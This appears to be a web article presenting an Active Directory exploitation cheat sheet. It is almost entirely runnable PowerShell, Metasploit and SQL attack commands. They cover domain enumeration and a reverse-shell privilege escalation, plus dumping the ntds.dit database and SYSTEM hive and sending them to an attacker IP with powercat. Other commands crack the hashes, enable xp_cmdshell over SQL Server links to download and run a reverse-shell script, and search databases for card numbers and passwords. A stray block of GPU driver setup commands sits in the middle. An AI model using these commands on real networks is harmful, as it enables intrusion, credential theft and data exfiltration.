## know how active directory exploitation
## know how active directory exploitation cheat sheetActive Directory is a Microsoft service run in the Server that predominantly used to manage various permission and resources around the network, also it performs an authenticates and authorizes all users and computers in a Windows domain type networks.
Recent cyber-attacks are frequently targeting the vulnerable active directory services used in enterprise networks where the organization handling the 1000's of computers in the single point of control called "Domain controller" which is one of the main targeted services by the APT Hackers.
Though exploiting Active directory is a challenging task, It is certain to activate directory exploitation Cheat Sheet which contains common enumeration and attack methods which including the several following phases to make it simple.
- Recon
- Domain Enum
- Local Privilege Escalation
- User Hunting
- Domain Admin Privileges
- Database Hunting
- Data Exfiltration
- Active Directory Exploitation Tools
Recon Phase contains various modules, including Port scan that performs the following operations.
Import-Module Invoke-Portscan.ps1
<#
Invoke-Portscan -Hosts "websrv.domain.local,wsus.domain.local,apps.domain.local" -TopPorts 50 echo websrv.domain.local | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080" Invoke-Portscan -Hosts 172.16.0.0/24 -T 4 -TopPorts 25 -oA localnet
#>
The secret to being able to run AD enumeration commands from the AD Powershell module on a system without RSAT installed, is the DLL located in C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management on a system that has the RSAT installed.
Set up your AD VM, install RSAT, extract the dll and drop it to the target system used to enumerate the active directory.
Import-Module .\Microsoft.ActiveDirectory.Management.dll
Get-Command get-adcom*
- Get current domain
Get-NetDomain (PowerView)
Get-ADDomain (ActiveDirectory Module)
- Get object of another domain
Get-NetDomain -Domain domain.local
Get-ADDomain -Identity domain.local
- Get domain SID for the current domain
Get-DomainSID
(Get-ADDomain).DomainSID
- Get domain policy for the current domain
Get-DomainPolicy
(Get-DomainPolicy)."system access"
- Get domain policy for another domain
(Get-DomainPolicy -domain domain.local)."system access"
- Get domain controllers for the current domain
Get-NetDomainController
Get-ADDomainController
- Get domain controllers for another domain
Get-NetDomainController -Domain domain.local
Get-ADDomainController -DomainName domain.local -Discover
- Get a list of users in the current domain
Get-NetUser
Get-NetUser -Username student1
Get-NetUser | select -ExpandProperty samaccountname
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity student1 -Properties *
- Get list of all properties for users in the current domain
Get-UserProperty
Get-UserProperty -Properties pwdlastset
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
- Search for a particular string in a user's attributes
Find-UserField -SearchField Description -SearchTerm "built"
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description
- Get a list of computers in the current domain
Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData
Get-ADComputer -Filter * | select Name Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
Get-ADComputer -Filter * -Properties *
- Get all the groups in the current domain
Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-ADGroup -Filter * | select Name
Get-ADGroup -Filter * -Properties *
- Get all groups containing the word "admin" in group name
Get-NetGroup *admin*
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
- Get all the members of the Domain Admins group
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain target.local
- Get the group membership for a user
Get-NetGroup -UserName "john"
Get-ADPrincipalGroupMembership -Identity student1
- List all the local groups on a machine (needs administrator privs on non-dc machines)
Get-NetLocalGroup -ComputerName DC01.enumme.local -ListGroups
- Get members of all the local groups on a machine (needs administrator privs on non-dc machines)
Get-NetLocalGroup -ComputerName DC01.enumme.local -Recurse
- Get actively logged users on a computer (needs local admin rights on the target)
Get-NetLoggedon -ComputerName <servername>
- Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)
Get-LoggedonLocal -ComputerName DC01.enumme.local
- Get the last logged user on a computer (needs administrative rights and remote registry on the target)
Get-LastLoggedOn -ComputerName <servername>
- Find shares on hosts in current domain
Invoke-ShareFinder -Verbose
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose
- Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose
- Get all fileservers of the domain
Get-NetFileServer
Windows VM
- Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
- In Autoruns, click on the ‘Logon’ tab.
- From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”.
- In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
- From the output, notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “program.exe” file.
Kali VM
- Open command prompt and type: msfconsole
- In Metasploit (msf > prompt) type: use multi/handler
- In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
- In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
- In Metasploit (msf > prompt) type: run
- Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
- Copy the generated file, program.exe, to the Windows VM.
Windows VM
- Place program.exe in ‘C:\Program Files\Autorun Program’.
- To simulate the privilege escalation effect, logoff and then log back on as an administrator user.
Kali VM
- Wait for a new session to open in Metasploit.
- In Metasploit (msf > prompt) type: sessions -i [Session ID]
- To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid
Kali VM
- Open command prompt and type: msfconsole
- In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
- In Metasploit (msf > prompt) type: set uripath x
- In Metasploit (msf > prompt) type: run
Windows VM
- Open Internet Explorer and browse to: http://[Kali VM IP Address]/x
- Open command prompt and type: taskmgr
- In Windows Task Manager, right-click on the “iexplore.exe” in the "Image Name" columnand select “Create Dump File” from the popup menu.
- Copy the generated file, iexplore.DMP, to the Kali VM.
Kali VM
- Place 'iexplore.DMP' on the desktop.
- Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
- Select the Copy the Base64 encoded string.
- In command prompt type: echo -ne [Base64 String] | base64 -d
- Notice the credentials in the output.
- Find all machines on the current domain where the current user has local admin access (Get-NetComputer + Invoke-CheckLocalAdminAccess)
Find-LocalAdminAccess -Verbose
- Find Administrative access
. .\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
# No Stateful
Enter-PSSession -ComputerName targetcomputer.target.domain.local
# Stateful
$sess = New-Pssession -ComputerName targetcomputer.target.domain.local
Enter-Pssession -session $sess
- If RPC and SMB are blocked check with WMI
. .\Find-WMILocalAdminAccess.ps1
- Find local admins on all machines of the domain (Get-NetComputer+Get- NetLocalGroup)
Invoke-EnumerateLocalAdmin -Verbose
- Find computers where a domain admin (or specified user/group) has sessions
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
- Confirm admin access
Invoke-UserHunter -CheckAccess
- Find computers where a domain admin is logged-in ( Get-NetSession / Get-NetLoggedon )
Invoke-UserHunter -Stealth
- WAIT FOR INCOMING SESSINON
Invoke-UserHunter -ComputerName targetserver -Poll 100 -UserName Administrator -Delay 5 -Verbose
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
mkdir c:\extract
REM -> c:\Windows\system32
vssadmin create shadow /for=c:
copy \\?GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\ntds\ntds.dit c:\extract\ntds.dit
reg SAVE HKLM\SYSTEM c:\extract\SYS
REM yes
REM exfiltrate to your attacker computer
REM housekeeping
vssadmin delete shadows /shadow={PATH} /Quiet
# Create script.txt file that will contain the shadow copy process script
#Script ->{
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
#}
# TRANSFERT TO TARGET SYSTEM
Invoke-WebRequest -Uri "http://10.10.10.10/script.txt" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\script.txt"
# EXEC DISKSHADOW
cd C:\windows\system32\spool\drivers\color
diskshadow.exe -s script.txt
# CHECK THE CAB
ls
-a---- 6/7/2020 9:31 PM 743 example.cab
# IMPORTING DLL SeBackupPrivilegeCmdLets & SeBackupPrivilegeUtils
Invoke-WebRequest -Uri "http://10.10.10.10/SeBackupPrivilegeCmdLets.dll" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\SeBackupPrivilegeCmdLets.dll"
Invoke-WebRequest -Uri "http://10.10.10.10/SeBackupPrivilegeUtils.dll" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\SeBackupPrivilegeUtils.dll"
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
# CHECK MODULE
get-help SeBackupPrivilege
Name Category Module Synopsis
---- -------- ------ --------
Get-SeBackupPrivilege Cmdlet SeBackupPrivilegeCmdLets ...
Set-SeBackupPrivilege Cmdlet SeBackupPrivilegeCmdLets ...
Copy-FileSeBackupPrivilege Cmdlet SeBackupPrivilegeCmdLets ...
#Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\Windows\temp\ntds.dit -Overwrite
# Dump ACTUAL SYSTEM hive
reg.exe save HKLM\SYSTEM c:\temp\system.hive
# FILE TRANSFERT
powercat -c 10.10.10.10 -p 443 -i c:\Windows\temp\system.hive
powercat -c 10.10.10.10 -p 443 -i c:\Windows\temp\ntds.dit
- -ntds: location and name of the ntds.dit file
- -system: location and name of the SYSTEM hive
- -hashes lmnhash:nthash: NTLM hash
- LOCAL: parse files on the local system
- -outputfile: location and name of the output file. Extensions are automatically added based on content extracted
# impacket
secretsdump.py -ntds ntds.dit -system SYS -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
apt install -y nvidia-driver nvidia-cuda-toolkit
apt install -y mesa-utils
# CHECK
nvidia-smi
# CHECK
nvidia-smi -i 0 -q
# CHECK
glxinfo | grep -i "direct rendering"
- -m 1000: NTLM | Operating Systems
- ntlm-extract.ntds: secretsdump outfile
- /usr/share/wordlists/rockyou.txt: plaintext wordlist
- -o: location of cracked hash
hashcat -m 1000 ntlm-extract.ntds /usr/share/wordlists/rockyou.txt -o cracked
cat cracked
Tool : PowerUpSQL
Import-Module .\PowerupSQL.psd1
Get-SQLInstanceLocal -Verbose
Get-SQLInstanceBroadcast -Verbose
Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1
Get-SQLInstanceFile -FilePath c:\temp\computers.txt | Get-SQLInstanceScanUDPThreaded -Verbose
runas /noprofile /netonly /user:domain\user PowerShell.exe
import-module PowerUpSQL.psd1
Get-SQLInstanceDomain -Verbose -DomainController 172.16.0.1 -Username domain\user -password 'P@ssword123'
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Get-SQLServerLink -Instance db-mssql -Verbose
Get-SQLServerLinkCrawl -Instance db-mssql -Verbose
Get-SQLInstanceDomain -Verbose -DomainAccount SQLSvc
Get-SQLInstanceDomain -Verbose | Group-Object DomainAccount | Sort-Object count -Descending | select Count,Name | Where-Object {($_.name -notlike "*$") -and ($_.count -gt 1) }
Get-SQLQuery -Verbose -Instance "10.2.2.5,1433"
# Server and Instance Name
Get-SQLQuery -Verbose -Instance "servername\instancename" -username testuser -password testpass
# IP and Instance Name
Get-SQLQuery -Verbose -Instance "10.2.2.5\instancename" -username testuser -password testpass
# IP and Port
Get-SQLQuery -Verbose -Instance "10.2.2.5,1433" -username testuser -password testpass
Get-SQLServerInfo -Verbose -Instance SQLServer1\Instance1
#
$ServerInfo = Get-SQLInstanceDomain | Get-SQLServerInfoThreaded -Verbose -Threads 10
$ServerInfo
Get an inventory of common objects from the remote server including permissions, databases, tables, views etc, and dump them out into CSV files.
Invoke-SQLDumpInfo -Verbose -Instance Server1\Instance1
Invoke-SQLAudit -Verbose -Instance SQLServer1
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20
Get-SQLServerLinkCrawl -Instance db-mssql -Query "sp_configure 'show advanced options', '1'"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "RECONFIGURE"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "sp_configure 'xp_cmdshell', '1'"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "RECONFIGURE"
Get-SQLQuery -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "msqlsrv.domain.local"'
Get-SQLServerLinkCrawl -Instance DOMAIN\SQLEXPRESS 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "msqlsrv.domain.local"'
osql -E -S "db-mssql" -Q "EXECUTE('sp_configure ''xp_cmdshell'',1;RECONFIGURE;') AT [msqlsrv.domain.local]"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "exec master..xp_cmdshell "whoami'"
Get-SQLServerLinkCrawl -Instance db-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.10:1433/revshell_FUD.ps1'')"'
Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "credit,ssn,password" -SampleSize 2 -ValidateCC -NoDefaults
Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLDatabaseThreaded -Verbose -Threads 10 -NoDefaults | Where-Object {$_.is_encrypted -eq "TRUE"} | Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "card, password" -SampleSize 2 -ValidateCC -NoDefaults
Get-SQLServerPasswordHash -Verbose -Instance MSSQLSERVER2016\db-mssql -Migrate